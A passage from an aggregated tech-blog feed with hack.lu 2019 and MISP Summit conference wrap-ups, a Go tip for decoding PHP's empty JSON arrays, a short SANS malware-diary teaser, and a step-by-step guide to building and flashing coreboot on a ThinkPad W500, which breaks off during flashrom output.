Then, the next presentation was “What the log?! So many events, so little time…” by Miriam Wiesner from the Microsoft Defender ATP team. In a typical attack, there is a huge gap between the compromise and its detection: more than 200 days to detect a breach (depending on the industry), while attackers need only 24-48h to pivot internally. And many organizations simply don’t know that they’ve been breached. “But we are safe! We have a firewall and an antivirus!” Users remain the weakest link. Miriam mentioned the Microsoft Security Compliance Toolkit 1.0. Event logs contain so many events that Microsoft’s reference document is more than 700 pages long. Event List 1.0 is an Excel sheet that lets you import security baselines and choose one to generate the list of events to monitor for that baseline.

Event List PowerShell Interface

Event List is also compatible with the MITRE ATT&CK framework. You can generate GPOs or rules for Splunk. Guess what? Event List works with Sigma too! This was one of my favorite talks today!

Marion Marschalek presented “The Glitch In The Matrix“. Marion works at Intel STORM and was presenting for the 5th time at hack.lu. As usual, her slides were very deep and technical but well designed. To summarize: we always say that if an attacker has physical access to your computer, you should consider it lost. Marion explained that the same is true for compilers: if an attacker has access to your compiler (GCC in this case), you can’t trust the generated code.

GCC Architecture

After the afternoon coffee break, “Hacktivism as a defense technique in a cyberwar. #FRD Lessons for Ukraine” was presented by Kostiantyn Korsun, from Ukraine. This country is known to have been (and still be) under constant waves of cyber-attacks: the election in 2014, BlackEnergy in 2015, NotPetya in 2017, etc. Attacks are successful because vulnerabilities are present everywhere. That’s why the concept of “FRD”, or “F*ck Responsible Disclosure”, was introduced. It’s a mix of responsible and full disclosure: information is disclosed publicly, but without a working exploit. The motivation behind this is the overall improvement of the country’s security. But is it legal?

Kostiantyn on Stage

There are many positive outcomes thanks to FRD: more visibility, increased budgets. And it’s supported by Ukrainian law enforcement services. So, it’s fun, legal, brings positive things and is still ongoing. But it’s important to keep in mind the difference between “open” access to data and “hacking”. This topic was indeed covered during the Q&A session! For some attendees, the line was not very clear.

And we continued with “DeTT&CT: Mapping your Blue Team to MITRE ATT&CK” by Ruben Bouman & Marcus Bakker. They explained the issues they faced and how they improved their hunting capabilities. Where to start hunting? They follow this path: Data Source > Visibility > Detection > TTPs. The next part of the presentation covered the framework they developed (DeTT&CT) to administer, score and compare data source quality, visibility, detection and behaviors.

The last slot of the day was assigned to Takahiro Haruyama, who presented “Defeating APT10 Compiler-level Obfuscations“. Compilers have multiple optimization and obfuscation techniques that are a pain for malware analysts. One of these techniques, called “opaque predicates”, was covered by Takahiro. It was way too deep for me!
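
To give a flavor of the technique (a toy example of my own, not from the talk): an opaque predicate is a branch whose outcome is constant but hard to prove statically, so the dead branch can hide junk code that bloats the analysis:

package main

// Toy opaque predicate: x*(x+1) is always even, so the "else" branch is dead
// code, but a disassembler cannot easily prove it and must analyze both paths.
import "fmt"

func main() {
	x := 42 // any integer gives the same result
	if (x*(x+1))%2 == 0 {
		fmt.Println("real code path, always taken")
	} else {
		fmt.Println("junk path, never executed but confusing the analyst")
	}
}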

The day finished with some fun: the classic lightning talks (5 mins / speaker) and a brand new idea: the “Call for Failure”. The goal is to give 10 minutes to a speaker to tell a failure or nightmare story they faced (we all have stories like this). It was a big success, with 5 submissions and a lot of laughs!

Slides will be published soon, and I’d like to mention Cooper, who’s doing an amazing job recording the talks, post-processing them and publishing them on YouTube in almost real-time!

[The post Hack.lu 2019 Day #2 Wrap-Up has been first published on /dev/random]

October 22, 2019

Hello Readers! The first day of the hack.lu conference is already over; here is my wrap-up! The event started around 10:30, plenty of time to meet friends over a first coffee!

The conference was kicked off by Axelle Apvrille who is a security researcher focusing on mobile devices and apps. The title was “Smartphone apps: let’s talk about privacy“.

Axelle on Stage

Privacy and smartphones… a strange feeling, right? Axelle’s idea was to give an overview of what leaks from our beloved devices, and how much, and how to spot privacy issues. The research was based on classic popular applications, analyzed from a privacy and security point of view with the tool Droidlysis. It disassembles the app and searches for patterns like attempts to run an executable, obfuscation, or attempts to retrieve the phone number, etc. Many apps retrieve IMEI numbers or the GPS location (ex: a cooking app!?). Guess what: many of them fetch data that is not relevant for normal operations. The package size can also be an indicator: more than 500 lines of Android manifest for some apps! Axelle asked us not to disclose which ones. Axelle also checked what is leaked from a network point of view: mitmproxy or, better, Frida to hook calls to HTTP(S) requests. She found Firebase leaks in a medical app for diabetic users. A good tip for developers: do not integrate dozens of 3rd-party SDKs, and provide ways to disable tracking, logging and analytics.

Then, Desiree Sacher presented “Fingerpointing false positives: how to better integrate continuous improvement into security monitoring“. Desiree is working as a SOC architect and hates “false positives”.

Desiree on Stage

A SOC needs to rely on accurate company data to work efficiently. Her goal: build intelligent processes, efficient workflows and detection capabilities. How to prevent false positives? From a technical point of view (ex: change the log management configuration or collection) or through admin/user action (ex: update the process). She reviewed different situations that you could face within your SOC and how to address them. For example, for key business process artefacts, if you get bad IOCs or wrong rule patterns, do not hesitate to challenge your provider. Also, test alerts! They should be excluded from reporting. Desiree published an interesting paper on optimizing your SOC.

Harlo presented “Tiplines today“. She works for the Freedom of the Press Foundation, a non-profit organization which does, amongst other things, software development (securedrop.org), but also advocacy (the US Press Freedom Tracker) and education (digital security training). The talk covered multiple techniques and tools to communicate safely.

Messaging Apps Privacy Behaviour

After the lunch break, the stage went to Chris Kubecka, who presented “The road to hell is paved with bad passwords“. It was the story of an incident that she handled. It started (as in many cases) with an email compromise, followed by some email MITM, the installation of a rootkit and some extortion. The initial compromise (the mailbox) was due to a very weak password: “123456”! Chris reviewed all the aspects of the incident. In the end, no extortion was paid, and the suspect was reassigned and neutralized. Lessons learned: geopolitics, real human consequences, never trust gifts, prepare and… don’t panic!

Eyal Itkin, from Check Point, came on stage with a talk called “Say cheese – how I ransomwared your DSLR camera?“. Like every year, Check Point comes back to hack.lu with a new idea: what could be broken? 🙂 Conferences are good for this, as are friends who use the targets on a daily basis. Why cameras? Photography is a common hobby with many potential victims. People buy expensive cameras and protect them (handle them with care). They also contain memories from special events (birthdays, grandma’s pictures, …) with a huge emotional impact on victims. Once you have compromised the device, what to do? Brick it or set up an espionage tool? Why not ransomware? Some people reverse the firmware and add features (see magiclantern.fm). An open source project is great in this case; the documentation is key! The attack vector was PTP (Picture Transfer Protocol), not only over USB but also over TCP/IP. There was already a talk about PTP presented at HITB in 2013, but more from a spying-device angle. The protocol has no authentication nor encryption: just ask the camera to take a picture and transfer it. First step: analyze the firmware. Grab it from the vendor website… but it was AES-encrypted and Google did not know the key. Can we dump the firmware from the camera? ROM dumper! MagicLantern had the key; let’s dump the firmware and load it into IDA. The OS is DryOS, a real-time OS proprietary to Canon. Let’s break PTP: each command has a code (open, close, create, etc). He found 3 RCEs, 2 of them related to Bluetooth. CVE-2019-5998 was the most interesting: a classic buffer overflow, but not exploitable over WiFi. So he restarted, looking for more exploits. The last step was to write the ransomware itself; why reinvent the wheel? Use the built-in AES functions. The idea was to deliver the ransomware via a fake update. The presentation ended with a recorded demo of a camera being infected:

Ransomwared Camera Demo

Eve Matringe was the next speaker with a talk titled “The regulation 2019/796 concerning restrictive measures against cyber-attacks threatening the Union or its member states”, or… is Europe now NSA/Russia cyberbullet-proof? This talk was not technical at all and very much oriented toward regulation (as the title suggests), which is not easy to follow when you’re not involved with such texts on a day-to-day basis. But for me it was a good discovery; I was not aware of the regulation’s existence.

Matthias Deeg & Gerhard Klostermeier presented “New tales of wireless input devices“. Their research is based on the HackRF One and the CrazyRadio PA. It’s not a new topic; many talks have already covered this technology. They started with a quick recap of previous research on wireless keyboards and mice (going back to 2016!). Interesting, but nothing brand new; guess what? Such devices have lots of weaknesses and should definitely not be used in restricted/sensitive environments. Personally, I liked the picture of the three presentation pointers bought from Logitech: once opened, they revealed three totally different PCBs. Was there a rogue one amongst them? The question was asked to Logitech and no information was disclosed.

Solal Jacob presented “Memory forensics analysis of Cisco IOS XR 32 bits routers with Amnesic-Sherpa“. It was a short talk (20 mins) in which Solal explained the technique and tools used to perform memory analysis on Cisco routers. Such devices are more and more often involved in security incidents, so it’s good to know that software exists to deal with them.

Finally, Ange Albertini closed the first day with his famous “Kill MD5 – Demystifying hash collisions“. See my wrap-up from Pass The Salt 2019, where Ange presented the same content.

To conclude, a first good day with nice content. I appreciated the large number of women who presented today! Good to see a better balance in security conferences! Stay tuned tomorrow for the second day!

[The post Hack.lu 2019 Day #1 Wrap-Up has been first published on /dev/random]

If you’ve ever used Go to decode the JSON response returned by a PHP API, you’ve probably run into this error:

json: cannot unmarshal array into Go struct field Obj.field of type map[string]string

The problem here is that PHP, rather than returning the empty object you expected ({}), returns an empty array ([]). Not completely unexpected: in PHP there’s no difference between maps/objects and arrays.

Sometimes you can fix the server:

return (object)$mything;

This ensures that an empty $mything becomes {}.

But that’s not always possible; you might have to work around it on the client. With Go, that’s not all that hard.

First, define a custom type for your object:

type MyObj struct {
    ...
    Field map[string]string `json:"field"`
    ...
}

Becomes:

type MyField map[string]string

type MyObj struct {
    ...
    Field MyField `json:"field"`
    ...
}

Then implement the Unmarshaler interface:

func (t *MyField) UnmarshalJSON(in []byte) error {  
    if bytes.Equal(in, []byte("[]")) {
        return nil
    }

    m := (*map[string]string)(t)
    return json.Unmarshal(in, m)
}

And that’s it! JSON deserialization will now gracefully ignore empty arrays returned by PHP.

Some things of note:

  • The method is defined on a pointer receiver (*MyField). This is needed to correctly update the underlying map.
  • I’m converting the t pointer to a *map[string]string. This avoids infinite recursion when we later call json.Unmarshal().
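
Putting it all together, here is a self-contained check (repeating the definitions from above) showing that both the PHP-style empty array and a real object now decode cleanly:

package main

import (
	"bytes"
	"encoding/json"
	"fmt"
)

type MyField map[string]string

type MyObj struct {
	Field MyField `json:"field"`
}

func (t *MyField) UnmarshalJSON(in []byte) error {
	if bytes.Equal(in, []byte("[]")) {
		return nil // PHP's empty array: leave the map untouched
	}
	m := (*map[string]string)(t)
	return json.Unmarshal(in, m)
}

func main() {
	var a, b MyObj
	// The PHP-style empty array no longer causes an error...
	fmt.Println(json.Unmarshal([]byte(`{"field":[]}`), &a)) // <nil>
	// ...and real objects still decode as before.
	fmt.Println(json.Unmarshal([]byte(`{"field":{"k":"v"}}`), &b), b.Field) // <nil> map[k:v]
}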

Comments | More on rocketeer.be | @rubenv on Twitter

When using strace on a server, you might get this error message when you try to attach to a running process.

October 21, 2019

I’m in Luxembourg for a full week of infosec events. It started today with the MISP summit. It was already the fifth edition and, based on the number of attendees, the tool is getting more and more popular. The event started with a recap of what happened since the last edition. It was a pretty busy year with many improvements and add-ons. More and more people contribute to the project.

MISP is not only a tool; other parallel projects try to improve the sharing of information, and there is a project to make it the European sharing standard. More evidence that the product is really used and alive: nine CVEs were disclosed in 2019. On the GitHub repository, 331 people have contributed to the MISP project:

MISP Contributors

I liked the way it was organized: the schedule was based on short talks (20 minutes max) with straight-to-the-point content: improvements, integrations or specific use-cases.

The first one was a review of MISP users’ feelings about the platform. Statistics were generated based on a survey. Not many people replied, but the results look interesting. The conclusion is that MISP is used by skilled people, but they consider the tool complex to use. The survey was given to people who attended a MISP training organized in Luxembourg; it could be a good idea to collect data from more people.

There were two presentations about performance improvements. People dived into the code to find how to optimize the sharing process or the comparison of IOCs (mainly malware samples). Other presentations covered ways to improve features like Sightings.

New releases of MISP introduce new features. The decaying of IOCs was introduced one month ago and looks very interesting. There was a presentation from the team about this feature, but also another one from a CERT that implemented its own model to expire IOCs.

MISP is a nice tool, but it must be interconnected with your existing toolbox. One of the presentations covered the integration of MISP with Maltego to build powerful investigation graphs.

Another talk covered the integration with WHIDS (Windows Host IDS), which relies on Sysmon. It correlates events, detects, and reacts (dump a file, a process or the registry). Gene is the detection engine behind WHIDS; it can be seen as a YARA-like tool for Windows events. MISP support was recently added, with some challenges like performance (huge numbers of IOCs).

EclecticIQ presented how their platform can be used with MISP. They created a MISP extension to perform enrichment.

Then came TICK (Threat Intelligence Contextualization Knowledgebase) by the KPN SRT. The KPN guys explained how they enrich SOC incidents with some context. I liked the use of Certificate Transparency monitoring. The goal is to use MISP as a central repository to distribute their IOCs to 3rd parties.

Another presentation that got my attention was about deploying MISP in the cloud. At first, this looks tricky, but the way it was implemented is nice. The presentation was based on AWS, but any cloud provider could be used: fully automatic, with load-balancers and self-provisioning. Great project!

Finally, the day ended with the changes that are in the pipe for upcoming MISP releases: some old code will be dropped, the web UI will be revamped, and there will be a migration to more recent versions of PHP, Python & more!

Thanks to an event like this one, you quickly realize that the MISP project became mature and that many organizations are using it on a daily basis (like I do).

[Update] Talks have been recorded. I presume that they will be online soon with presentations as well. Check the website.

[The post MISP Summit 0x05 Wrap-Up has been first published on /dev/random]

On a freshly installed CentOS 7 machine, I got the following notice when I SSH’d into the server.

October 18, 2019

I published the following diary on isc.sans.edu: “Quick Malicious VBS Analysis“:

Let’s have a look at a VBS sample found yesterday. It started as usual with a phishing email that contained a link to a malicious ZIP archive. This technique is more and more common to deliver the first stage via a URL because it reduces the risk of having the first file blocked by classic security controls. The link was:

hxxp://weddingcardexpress[.]com/ext/modules/payment/moneybookers/logos/docs/8209039094.zip

The downloaded file, saved as JVC_53668.zip (SHA256: 9bf040f912fce08fd5b05dcff9ee31d05ade531eb932c767a5a532cc2643ea61), has a VT score of 1/56… [Read more]

[The post [SANS ISC] Quick Malicious VBS Analysis has been first published on /dev/random]

October 17, 2019

coreboot_logo

I use(d) Libreboot on my Lenovo W500, and it works fine… but I want to install FreeBSD on it. The GRUB payload that Libreboot uses by default isn’t compatible with the FreeBSD bootloader. It is possible to boot FreeBSD from GRUB or to recompile Libreboot with the SeaBIOS payload… but I just wanted to play with coreboot, to be honest :-)

Prepare

Blobs

To install coreboot, you normally extract the required blobs from your current BIOS; for obvious reasons, I didn’t want to do this. Libreboot has a utility, ich9gen, to generate the required blobs: the flash descriptor and GbE (gigabit ethernet) regions.

Install Debian 10 (buster)

I used Debian GNU/Linux 10 (buster) to compile coreboot.

Libreboot

We need the ich9gen utility from Libreboot to generate the blobs in a Free way with the correct MAC address. The MAC address is normally on a label inside your laptop, or you can copy it from the output of the ifconfig command.

Get gpg key

staf@coreboot2:~/libreboot$ gpg --keyserver keys.gnupg.net/ --recv-keys 0x969A979505E8C5B2
gpg: /home/staf/.gnupg/trustdb.gpg: trustdb created
gpg: key 969A979505E8C5B2: public key "Leah Rowe (Libreboot signing key) <info@minifree.org>" imported
gpg: Total number processed: 1
gpg:               imported: 1
staf@coreboot2:~/libreboot$ 

Download

Create the libreboot download directory

staf@coreboot2:~$ mkdir libreboot

Download the checksum files

staf@coreboot2:~/libreboot$ wget https://www.mirrorservice.org/sites/libreboot.org/release/stable/20160907/SHA512SUMS
staf@coreboot2:~/libreboot$ wget https://www.mirrorservice.org/sites/libreboot.org/release/stable/20160907/SHA512SUMS.sig

Verify

staf@coreboot2:~/libreboot$ gpg --verify SHA512SUMS.sig 

Create gbe.bin with the correct MAC address

Download the libreboot util

Download

staf@coreboot2:~/libreboot$ wget https://www.mirrorservice.org/sites/libreboot.org/release/stable/20160907/libreboot_r20160907_util.tar.xz

Verify

staf@coreboot2:~/libreboot$ sha512sum libreboot_r20160907_util.tar.xz
c5bfa5a06d55c61e5451e70cd8da3f430b5e06686f9a74c5a2e9fe0e9d155505867b0ca3428d85a983741146c4e024a6b0447638923423000431c98d048bd473  libreboot_r20160907_util.tar.xz
staf@coreboot2:~/libreboot$ 
staf@coreboot2:~/libreboot$ grep c5bfa5a06d55c61e5451e70cd8da3f430b5e06686f9a74c5a2e9fe0e9d155505867b0ca3428d85a983741146c4e024a6b0447638923423000431c98d048bd473 SHA512SUMS

Untar

staf@coreboot2:~/libreboot$ tar xvf libreboot_r20160907_util.tar.xz

find

staf@coreboot2:~/libreboot$ find ./libreboot_r20160907_util | grep -i ich9gen
./libreboot_r20160907_util/ich9deblob/i686/ich9gen
./libreboot_r20160907_util/ich9deblob/armv7l/ich9gen
./libreboot_r20160907_util/ich9deblob/x86_64/ich9gen
staf@coreboot2:~/libreboot$ 

Copy

staf@coreboot2:~/libreboot$ cp ./libreboot_r20160907_util/ich9deblob/i686/ich9gen .

Create

staf@coreboot2:~/libreboot$ ./ich9gen --macaddress XX:XX:XX:XX:XX:XX
You selected to change the MAC address in the Gbe section. This has been done.

The modified gbe region has also been dumped as src files: mkgbe.c, mkgbe.h
To use these in ich9gen, place them in src/ich9gen/ and re-build ich9gen.

descriptor and gbe successfully written to the file: ich9fdgbe_4m.bin
Now do: dd if=ich9fdgbe_4m.bin of=libreboot.rom bs=1 count=12k conv=notrunc
(in other words, add the modified descriptor+gbe to your ROM image)

descriptor and gbe successfully written to the file: ich9fdgbe_8m.bin
Now do: dd if=ich9fdgbe_8m.bin of=libreboot.rom bs=1 count=12k conv=notrunc
(in other words, add the modified descriptor+gbe to your ROM image)

descriptor and gbe successfully written to the file: ich9fdgbe_16m.bin
Now do: dd if=ich9fdgbe_16m.bin of=libreboot.rom bs=1 count=12k conv=notrunc
(in other words, add the modified descriptor+gbe to your ROM image)

descriptor successfully written to the file: ich9fdnogbe_4m.bin
Now do: dd if=ich9fdnogbe_4m.bin of=yourrom.rom bs=1 count=4k conv=notrunc
(in other words, add the modified descriptor to your ROM image)

descriptor successfully written to the file: ich9fdnogbe_8m.bin
Now do: dd if=ich9fdnogbe_8m.bin of=yourrom.rom bs=1 count=4k conv=notrunc
(in other words, add the modified descriptor to your ROM image)

descriptor successfully written to the file: ich9fdnogbe_16m.bin
Now do: dd if=ich9fdnogbe_16m.bin of=yourrom.rom bs=1 count=4k conv=notrunc
(in other words, add the modified descriptor to your ROM image)

staf@coreboot2:~/libreboot$ 

This created the required blobs.

staf@coreboot2:~/libreboot$ ls *.bin
flashregion_0_flashdescriptor.bin  flashregion_3_gbe.bin  ich9fdgbe_4m.bin  ich9fdnogbe_16m.bin  ich9fdnogbe_8m.bin
flashregion_1_bios.bin             ich9fdgbe_16m.bin      ich9fdgbe_8m.bin  ich9fdnogbe_4m.bin
staf@coreboot2:~/libreboot$ 

Compile Coreboot

Install the required packages to compile coreboot

staf@coreboot2:~$ sudo apt-get install -y bison build-essential curl flex git gnat libncurses5-dev m4 zlib1g-dev

git clone

staf@coreboot2:~$ git clone https://review.coreboot.org/coreboot
staf@coreboot2:~/coreboot$ git submodule update --init --checkout

make nconfig

Run make nconfig to get the coreboot configuration menu.

            /home/staf/coreboot/.config - coreboot configuration
 ┌── coreboot configuration ───────────────────────────────────────────────┐
 │                                                                         │
 │                          General setup  --->                            │
 │                          Mainboard  --->                                │
 │                          Chipset  --->                                  │
 │                          Devices  --->                                  │
 │                          Generic Drivers  --->                          │
 │                          Security  --->                                 │
 │                          Console  --->                                  │
 │                          System tables  --->                            │
 │                          Payload  --->                                  │
 │                          Debugging  --->                                │
 │                                                                         │
 │                                                                         │
 │                                                                         │
 │                                                                         │
 └F1Help─F2SymInfo─F3Help 2─F4ShowAll─F5Back─F6Save─F7Load─F8SymSearch─F9Exi

Mainboard

Select the Mainboard vendor (Lenovo), Mainboard model (ThinkPad W500), ROM chip size (8192 KB (8 MB)).

My W500 has an 8MB ROM chip; see https://stafwag.github.io/blog/blog/2019/02/10/how-to-install-libreboot-on-a-thinkspad-w500/.

           /home/staf/coreboot/.config - coreboot configuration
 ┌── Mainboard ────────────────────────────────────────────────────────────┐
 │                                                                         │
 │     *** Important: Run 'make distclean' before switching boards ***     │
 │     Mainboard vendor (Lenovo)  --->                                     │
 │     Mainboard model (ThinkPad W500)  --->                               │
 │     ROM chip size (8192 KB (8 MB))  --->                                │
 │     System Power State after Failure (S5 Soft Off)  --->                │
 │     ()  fmap description file in fmd format                             │
 │     (0x200000) Size of CBFS filesystem in ROM                           │
 │                                                                         │
 │                                                                         │
 │                                                                         │
 │                                                                         │
 │                                                                         │
 │                                                                         │
 │                                                                         │
 └F1Help─F2SymInfo─F3Help 2─F4ShowAll─F5Back─F6Save─F7Load─F8SymSearch─F9Exi

Chipset

Make sure that the Intel firmware is NOT selected. Normally you’d set it to the path of the extracted firmware, but we’ll use the blobs from Libreboot and dd the Free blobs into the coreboot ROM.

                               /home/staf/coreboot/.config - coreboot configuration
 ┌── Chipset ───────────────────────────────────────────────────────────────────────────────────────┐
 │                                                                                                  │
 │              *** SoC ***                                                                         │
 │              *** CPU ***                                                                         │
 │          [*] Enable VMX for virtualization (NEW)                                                 │
 │          [*] Set IA32_FEATURE_CONTROL lock bit (NEW)                                             │
 │              Include CPU microcode in CBFS (Generate from tree)  --->                            │
 │              *** Northbridge ***                                                                 │
 │              *** Southbridge ***                                                                 │
 │          [ ] Validate Intel firmware descriptor (NEW)                                            │
 │              *** Super I/O ***                                                                   │
 │              *** Embedded Controllers ***                                                        │
 │          [*] Beep on fatal error (NEW)                                                           │
 │          [*] Flash LEDs on fatal error (NEW)                                                     │
 │          [ ] Support bluetooth on wifi cards (NEW)                                               │
 │              *** Intel Firmware ***                                                              │
 │          [ ] Add Intel descriptor.bin file (NEW)                                                 │
 │              Protect flash regions (Unlock flash regions)  --->                                  │
 │                                                                                                  │
 └F1Help─F2SymInfo─F3Help 2─F4ShowAll─F5Back─F6Save─F7Load─F8SymSearch─F9Exit───────────────────────┘

Payload

Make sure the SeaBIOS payload is selected.

                               /home/staf/coreboot/.config - coreboot configuration
 ┌── Payload ───────────────────────────────────────────────────────────────────────────────────────┐
 │                                                                                                  │
 │             Add a payload (SeaBIOS)  --->                                                        │
 │             SeaBIOS version (1.12.1)  --->                                                       │
 │             (5000) PS/2 keyboard controller initialization timeout (milliseconds) (NEW)          │
 │          [ ] Hardware init during option ROM execution (NEW)                                     │
 │          [*] Include generated option rom that implements legacy VGA BIOS compatibility (NEW)    │
 │              ()  SeaBIOS config file (NEW)                                                       │
 │              ()  SeaBIOS bootorder file (NEW)                                                    │
 │          [ ] Add SeaBIOS sercon-port file to CBFS (NEW)                                          │
 │              (-1) SeaBIOS debug level (verbosity) (NEW)                                          │
 │                *** Using default SeaBIOS log level ***                                           │
 │          [ ] Add a PXE ROM (NEW)                                                                 │
 │                 Payload compression algorithm (Use LZMA compression for payloads)  --->          │
 │          [*] Use LZMA compression for secondary payloads (NEW)                                   │
 │              Secondary Payloads  --->                                                            │
 │                                                                                                  │
 │                                                                                                  │
 └F1Help─F2SymInfo─F3Help 2─F4ShowAll─F5Back─F6Save─F7Load─F8SymSearch─F9Exit───────────────────────┘

Save and exit

Press [ F9 ] to save and exit.

                              /home/staf/coreboot/.config - coreboot configuration
 ┌── coreboot configuration ────────────────────────────────────────────────────────────────────────┐
 │                                                                                                  │
 │                               General setup  --->                                                │
 │                               Mainboard  --->                                                    │
 │                               Chipset  --->                                                      │
 │                               Devices  --->                                                      │
 │                               Generic Drivers  --->                                              │
 │                               Security  --->                                                     │
 │                               Console  --->                                                      │
 │                               System tables  --->                                                │
 │                               Payload  --->                                                      │
 │                  ┌─────────────────────────────────────────────┐                                 │
 │                  │ Do you wish to save your new configuration? │                                 │
 │                  │ <ESC> to cancel and resume nconfig.         │                                 │
 │                  │                                             │                                 │
 │                  │            <save>    <don't save>           │                                 │
 │                  └─────────────────────────────────────────────┘                                 │
 │                                                                                                  │
 │                                                                                                  │
 └F1Help─F2SymInfo─F3Help 2─F4ShowAll─F5Back─F6Save─F7Load─F8SymSearch─F9Exit───────────────────────┘

Compiling

Compile the compiler

The first step is to compile the cross-compiler that will build coreboot. You can specify the number of cores to use with CPUS=.

staf@coreboot2:~/coreboot$ make crossgcc-i386 CPUS=4

compile coreboot

Run make to compile your BIOS.

staf@coreboot2:~/coreboot$ make
Skipping submodule '3rdparty/amd_blobs'
Skipping submodule '3rdparty/blobs'
Skipping submodule '3rdparty/fsp'
Skipping submodule '3rdparty/intel-microcode'
#
# configuration written to /home/staf/coreboot/.config
#
<snip>
Built lenovo/t400 (ThinkPad W500)

        ** WARNING **
coreboot has been built without an Intel Firmware Descriptor.
Never write a complete coreboot.rom without an IFD to your
board's flash chip! You can use flashrom's IFD or layout
parameters to flash only to the BIOS region.

staf@coreboot2:~/coreboot$ 

add the Libreboot descriptor and GbE image

add it

Copy the coreboot ROM.

staf@coreboot2:~/coreboot$ cp ./build/coreboot.rom my_w500.rom

and add the Libreboot descriptor and GbE image.

staf@coreboot2:~/coreboot$ dd if=~/libreboot/ich9fdgbe_8m.bin of=my_w500.rom bs=12k count=1 conv=notrunc
1+0 records in
1+0 records out
12288 bytes (12 kB, 12 KiB) copied, 0.000726109 s, 16.9 MB/s
staf@coreboot2:~/coreboot$ 

test the image with ifdtool

Coreboot includes a utility, ifdtool, to extract the blobs from a ROM. We use ifdtool to test our ROM.

Compile and install ifdtool

Go to the ifdtool source directory.

staf@coreboot2:~/coreboot$ cd util/ifdtool/

and run make install; this will install ifdtool into the /usr/local/bin/ directory.

staf@coreboot2:~/coreboot/util/ifdtool$ sudo make install
[sudo] password for staf: 
gcc -O2 -g -Wall -Wextra -Wmissing-prototypes -Werror -I../../src/commonlib/include -I../cbfstool/flashmap -include ../../src/commonlib/include/commonlib/compiler.h -c -o ifdtool.o ifdtool.c
gcc -O2 -g -Wall -Wextra -Wmissing-prototypes -Werror -I../../src/commonlib/include -I../cbfstool/flashmap -include ../../src/commonlib/include/commonlib/compiler.h -c -o fmap.o ../cbfstool/flashmap/fmap.c
gcc -O2 -g -Wall -Wextra -Wmissing-prototypes -Werror -I../../src/commonlib/include -I../cbfstool/flashmap -include ../../src/commonlib/include/commonlib/compiler.h -c -o kv_pair.o ../cbfstool/flashmap/kv_pair.c
gcc -O2 -g -Wall -Wextra -Wmissing-prototypes -Werror -I../../src/commonlib/include -I../cbfstool/flashmap -include ../../src/commonlib/include/commonlib/compiler.h -c -o valstr.o ../cbfstool/flashmap/valstr.c
gcc -o ifdtool ifdtool.o fmap.o kv_pair.o valstr.o 
mkdir -p /usr/local/bin
/usr/bin/env install ifdtool /usr/local/bin
staf@coreboot2:~/coreboot/util/ifdtool$ 

test it

staf@coreboot2:~/coreboot$ ifdtool -x my_w500.rom 
File my_w500.rom is 8388608 bytes
  Flash Region 0 (Flash Descriptor): 00000000 - 00000fff 
  Flash Region 1 (BIOS): 00003000 - 007fffff 
  Flash Region 2 (Intel ME): 00fff000 - 00000fff (unused)
  Flash Region 3 (GbE): 00001000 - 00002fff 
  Flash Region 4 (Platform Data): 00fff000 - 00000fff (unused)
staf@coreboot2:~/coreboot$ 

Flash

I already had a custom ROM (Libreboot) on my system; this makes it possible to flash the BIOS without disassembling the laptop and flashing it with a clip.

w500 and pi

See How to install Libreboot on a ThinkPad W500 if you need to flash it for the first time or if you bricked your laptop by flashing an invalid ROM onto it.

Grml

I used Grml to flash coreboot. Grml is a nice live GNU/Linux distribution that includes flashrom. You’ll need to boot it with the iomem=relaxed kernel parameter to be able to flash the BIOS.

Press [ TAB ] on the boot screen and add iomem=relaxed and press [ ENTER ] to boot.

test

root@grml ~ # flashrom -p internal:laptop=force_I_want_a_brick 
flashrom v0.9.9-r1954 on Linux 4.19.0-1-grml-amd64 (x86_64)
flashrom is free software, get the source code at https://flashrom.org

Calibrating delay loop... OK.
coreboot table found at 0x7fad6000.
========================================================================
WARNING! You seem to be running flashrom on an unsupported laptop.
Laptops, notebooks and netbooks are difficult to support and we
recommend to use the vendor flashing utility. The embedded controller
(EC) in these machines often interacts badly with flashing.
See the manpage and https://flashrom.org/Laptops for details.

If flash is shared with the EC, erase is guaranteed to brick your laptop
and write may brick your laptop.
Read and probe may irritate your EC and cause fan failure, backlight
failure and sudden poweroff.
You have been warned.
========================================================================
Proceeding anyway because user forced us to.
Found chipset "Intel ICH9M-E".
Enabling flash write... OK.
Found Macronix flash chip "MX25L6405" (8192 kB, SPI) mapped at physical address 0x00000000ff800000.
Found Macronix flash chip "MX25L6405D" (8192 kB, SPI) mapped at physical address 0x00000000ff800000.
Found Macronix flash chip "MX25L6406E/MX25L6408E" (8192 kB, SPI) mapped at physical address 0x00000000ff800000.
Found Macronix flash chip "MX25L6436E/MX25L6445E/MX25L6465E/MX25L6473E" (8192 kB, SPI) mapped at physical address 0x00000000ff800000.
Multiple flash chip definitions match the detected chip(s): "MX25L6405", "MX25L6405D", "MX25L6406E/MX25L6408E", "MX25L6436E/MX25L6445E/MX25L6465E/MX25L6473E"
Please specify which chip definition to use with the -c <chipname> option.
1 root@grml ~ #                                                                                                     :(

read the bios

1 root@grml ~ # flashrom -c "MX25L6405D" -p internal:laptop=force_I_want_a_brick -r w500libreboot.rom               :(
flashrom v0.9.9-r1954 on Linux 4.19.0-1-grml-amd64 (x86_64)
flashrom is free software, get the source code at https://flashrom.org

Calibrating delay loop... OK.
coreboot table found at 0x7fad6000.
========================================================================
WARNING! You seem to be running flashrom on an unsupported laptop.
Laptops, notebooks and netbooks are difficult to support and we
recommend to use the vendor flashing utility. The embedded controller
(EC) in these machines often interacts badly with flashing.
See the manpage and https://flashrom.org/Laptops for details.

If flash is shared with the EC, erase is guaranteed to brick your laptop
and write may brick your laptop.
Read and probe may irritate your EC and cause fan failure, backlight
failure and sudden poweroff.
You have been warned.
========================================================================
Proceeding anyway because user forced us to.
Found chipset "Intel ICH9M-E".
Enabling flash write... OK.
Found Macronix flash chip "MX25L6405D" (8192 kB, SPI) mapped at physical address 0x00000000ff800000.
Reading flash... done.
flashrom -c "MX25L6405D" -p internal:laptop=force_I_want_a_brick -r   7.38s user 0.01s system 99% cpu 7.392 total

and again

root@grml ~ # flashrom -c "MX25L6405D" -p internal:laptop=force_I_want_a_brick -r w500libreboot2.rom
flashrom v0.9.9-r1954 on Linux 4.19.0-1-grml-amd64 (x86_64)
flashrom is free software, get the source code at https://flashrom.org

Calibrating delay loop... OK.
coreboot table found at 0x7fad6000.
========================================================================
WARNING! You seem to be running flashrom on an unsupported laptop.
Laptops, notebooks and netbooks are difficult to support and we
recommend to use the vendor flashing utility. The embedded controller
(EC) in these machines often interacts badly with flashing.
See the manpage and https://flashrom.org/Laptops for details.

If flash is shared with the EC, erase is guaranteed to brick your laptop
and write may brick your laptop.
Read and probe may irritate your EC and cause fan failure, backlight
failure and sudden poweroff.
